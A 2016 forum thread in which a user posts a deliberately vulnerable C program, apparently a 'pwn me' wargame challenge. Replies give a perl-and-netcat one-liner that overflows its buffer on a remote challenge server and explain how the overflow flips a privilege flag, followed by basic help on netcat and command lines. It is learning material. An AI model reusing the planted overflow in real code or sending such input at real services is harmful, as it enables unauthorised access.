Do you know exploit on this code ??

Do you know exploit on this code ??

Post by Backbite on Tue Feb 02, 2016 9:26 pm
([msg=91473]see Do you know exploit on this code ??[/msg])

Code: Select all
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
        char name[50];
        int priv = 0;
        puts("Pwn me if you can!!\n");
                fgets(name,52, stdin);
        puts(stdin);
        if (priv){
                secret();
                getch();
        }
        else
                getch();
               
}
Last edited by Backbite on Wed Feb 10, 2016 9:15 pm, edited 1 time in total.
Backbite
New User
New User
 
Posts: 30
Joined: Wed Jun 20, 2012 10:24 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by boriz666 on Wed Feb 03, 2016 5:32 am
([msg=91476]see Re: Do you know exploit on this code ??[/msg])

Greetings,
a one liner to exploit this, if you have perl installed (most distros have):
perl -e 'print "1" x 53' | nc lxc.rop.sh 2026

Cheers!
boriz666
Experienced User
Experienced User
 
Posts: 99
Joined: Tue Mar 24, 2015 11:53 am
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by -Ninjex- on Wed Feb 03, 2016 9:44 pm
([msg=91477]see Re: Do you know exploit on this code ??[/msg])

The reason this works is because the fgets function is reserving 52 bytes. If you go over the allocated bytes, it begins to "overflow" that data elsewhere. It will overwrite the priv variable, setting the value to true, which then executes the secret(); and getch(); functions. The challenge seems easier than it should be, but maybe that's the point...

You could just normally nc into the machine and type anything in over 52 characters long to win. Perl was just a shorthand way of echoing 53 bytes to STDOUT and then the data was piped to the challenge server.
image
For those that know
K: 0x2CD8D4F9
User avatar
-Ninjex-
Moderator
Moderator
 
Posts: 1691
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by Backbite on Fri Feb 05, 2016 3:22 am
([msg=91483]see Re: Do you know exploit on this code ??[/msg])

boriz666 wrote:Greetings,
a one liner to exploit this, if you have perl installed (most distros have):
perl -e 'print "1" x 53' | nc lxc.rop.sh 2026

Cheers!


:o Perl lang
i wanna know , what is "nc" after pipe sign
Backbite
New User
New User
 
Posts: 30
Joined: Wed Jun 20, 2012 10:24 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by Backbite on Fri Feb 05, 2016 3:22 am
([msg=91484]see Re: Do you know exploit on this code ??[/msg])

-Ninjex- wrote:The reason this works is because the fgets function is reserving 52 bytes. If you go over the allocated bytes, it begins to "overflow" that data elsewhere. It will overwrite the priv variable, setting the value to true, which then executes the secret(); and getch(); functions. The challenge seems easier than it should be, but maybe that's the point...

You could just normally nc into the machine and type anything in over 52 characters long to win. Perl was just a shorthand way of echoing 53 bytes to STDOUT and then the data was piped to the challenge server.



I understand on your post but on solution & nc idk about it and how to input value to stdin ? (i'm windows user my editor is dev C++ :cry: )


thanks you for replied
regard Backbite
Last edited by Backbite on Fri Feb 05, 2016 3:39 am, edited 2 times in total.
Backbite
New User
New User
 
Posts: 30
Joined: Wed Jun 20, 2012 10:24 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by cyberdrain on Mon Feb 08, 2016 6:57 pm
([msg=91519]see Re: Do you know exploit on this code ??[/msg])

Backbite wrote:I understand on your post but on solution & nc idk about it and how to input value to stdin ? (i'm windows user my editor is dev C++

nc is netcat and perl is required for that solution. Echo is usually used to create data, but idk if Windows allows bytes to be sent that way. Using type on a file with stored bytes, created using a hex-editor, will send them to the CLI. From there you could try to pipe them into the program. I've never tried this, but it might work. You might need Linux to easily exploit it or create some code that will do it for you on Windows.
Free your mind / Think clearly
User avatar
cyberdrain
Expert
Expert
 
Posts: 2160
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by Backbite on Wed Feb 10, 2016 5:37 am
([msg=91548]see Re: Do you know exploit on this code ??[/msg])

cyberdrain wrote:
Backbite wrote:I understand on your post but on solution & nc idk about it and how to input value to stdin ? (i'm windows user my editor is dev C++

nc is netcat and perl is required for that solution. Echo is usually used to create data, but idk if Windows allows bytes to be sent that way. Using type on a file with stored bytes, created using a hex-editor, will send them to the CLI. From there you could try to pipe them into the program. I've never tried this, but it might work. You might need Linux to easily exploit it or create some code that will do it for you on Windows.


No problem for windows user i once tried perl on windows

But last Question What is CLI ?

Thanks you so much
regard Backbite
Backbite
New User
New User
 
Posts: 30
Joined: Wed Jun 20, 2012 10:24 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by -Ninjex- on Wed Feb 10, 2016 10:15 am
([msg=91556]see Re: Do you know exploit on this code ??[/msg])

Backbite wrote:But last Question What is CLI ?


CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUI's or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be firefox/google chrome
image
For those that know
K: 0x2CD8D4F9
User avatar
-Ninjex-
Moderator
Moderator
 
Posts: 1691
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by cyberdrain on Wed Feb 10, 2016 8:40 pm
([msg=91567]see Re: Do you know exploit on this code ??[/msg])

-Ninjex- wrote:CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUI's or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be firefox/google chrome

Adding to that: press the Windows key, type in cmd and run that. You'll see the (emulated) command line Windows can use. Type in help, press Enter and you'll see the list of available commands. You'll probably need some experience with command line interfaces if you're learning exploitation and Linux if you're serious about it.
Free your mind / Think clearly
User avatar
cyberdrain
Expert
Expert
 
Posts: 2160
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: Do you know exploit on this code ??

Post by Backbite on Wed Feb 10, 2016 9:23 pm
([msg=91569]see Re: Do you know exploit on this code ??[/msg])

-Ninjex- wrote:
Backbite wrote:But last Question What is CLI ?


CLI is an acronym for Command Line Interface. It's some application which takes input only via text/mouse. In other words, you don't have buttons and other fancy stuff. We refer to the fancy things as GUI's or Graphical User Interfaces. An example of a CLI program is a terminal. An example of a GUI program would be firefox/google chrome


i just know abbreviation word "CLI" is Command Line Interface :D

Adding to that: press the Windows key, type in cmd and run that. You'll see the (emulated) command line Windows can use. Type in help, press Enter and you'll see the list of available commands. You'll probably need some experience with command line interfaces if you're learning exploitation and Linux if you're serious about it.


i know cmd in windows but i never know it called CLI

Thanks you 2 replied , i got new experience feel so happy on this forum. :) :)
Regard Backbite
Backbite
New User
New User
 
Posts: 30
Joined: Wed Jun 20, 2012 10:24 pm
Blog: View Blog (0)


Next

Return to C and C++

Who is online

Users browsing this forum: No registered users and 0 guests